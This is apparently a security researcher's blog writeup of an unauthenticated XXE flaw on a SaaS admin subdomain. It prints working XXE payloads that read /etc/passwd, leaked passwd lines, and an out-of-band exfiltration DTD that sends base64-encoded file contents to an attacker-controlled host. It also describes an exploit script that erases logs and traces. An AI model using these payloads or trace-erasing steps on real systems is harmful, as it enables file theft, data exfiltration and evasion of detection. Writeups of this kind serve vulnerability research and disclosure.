> For the complete documentation index, see [llms.txt](https://0x4bd0.gitbook.io/4bd0_m4g3d/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0x4bd0.gitbook.io/4bd0_m4g3d/writeups/unauthenticated-oob-xxe-and-it-leaked-etc-passwd-inseconds.md).

# Unauthenticated OOB XXE-And It Leaked /etc/passwd inSeconds

### Intro &#x20;

While doing some routine recon on a SaaS target, I was collecting subdomains using tools like `Subfinder`, `Amass`, and `httpx`. During that, one subdomain stood out:&#x20;

`admin-panel.example.com`

From the name, it looked like an internal admin interface or backend portal. These are usually juicy enough to warrant a deeper look, so I decided to explore it further.

***

### Initial Observations&#x20;

Accessing the subdomain didn't prompt for any authentication ,  it returned a generic JSON/XML like API response, which immediately caught my attention.\
I started testing with some basic XML payloads, just to see how the backend would handle them. \
\
I submitted this simple request with a predefined XML entity:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY test "hello"> ]>
<foo>&test;</foo>
```

And to my surprise, the server responded: `hello`\
This indicated that external/internal entities were being resolved. So I moved on to testing file reads.

***

### Attempt to Read `/etc/passwd`&#x20;

The next step was trying to fetch a local file:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo
```

The response?&#x20;

```
root❌0:0:root:/root:/bin/bash 
... 
sshd❌109:65534::/run/sshd:/usr/sbin/nologin 
```

Confirmed - this was a full-blown XXE vulnerability on an unauthenticated endpoint.

***

### Taking It a Step Further - External DTD and Exfiltration&#x20;

I wanted to take the exploitation a bit further by using an external DTD hosted on a pastebin-like service. This allowed me to bypass size restrictions and exfiltrate data via DNS/HTTP.

\
The hosted DTD contained:

```xml
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://attacker-host.com/?exploited=%data;'>">
```

And the XML payload sent to the target looked like this:

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % ext SYSTEM "https://hosted-payload.example.com/payload.dtd">
  %ext;
  %param1;
]>
<data>&exfil;</data>

```

Within seconds, I saw the base64-encoded content of `/etc/passwd` landing on my listener. After decoding it, everything was crystal clear.

***

## **Automating the Exploit — Building My Own Script**,

After successfully verifying and exploiting the vulnerability manually, I decided to build a script to streamline the entire process and make it more efficient. The script I wrote performs the following:

* Uploads the malicious DTD file to a file-hosting service.,
* Sends the crafted XML payload to the vulnerable endpoint.,
* Uses an interactive listener to monitor for exfiltrated data.,
* Automatically decodes the base64-encoded output (if applicable).,
* Cleans up logs and removes any traces after execution.,

When I ran it against the target, I received actual output containing the base64-encoded contents of `/etc/passwd`. After decoding it, everything became crystal clear.

***

Real-World Run of the Exploit Here's what the actual terminal output looked like when I ran the script:

<figure><img src="/files/fRIWMJU8TmyDJ2UPBVHw" alt=""><figcaption></figcaption></figure>

Thanks for reading - stay curious, stay hacking.

**Linkedin**: [https://www.linkedin.com/in/0x4bdo/ ](https://www.linkedin.com/in/0x4bdo/)\
**GitHub**: <https://github.com/0x4bdo> \
**X**: <https://x.com/4bd0_m4g3d> \
**Facebook**: <https://web.facebook.com/abdo.maged.801650> \
**Medium**: [0x4bdo.medium.com](https://0x4bdo.medium.com/)
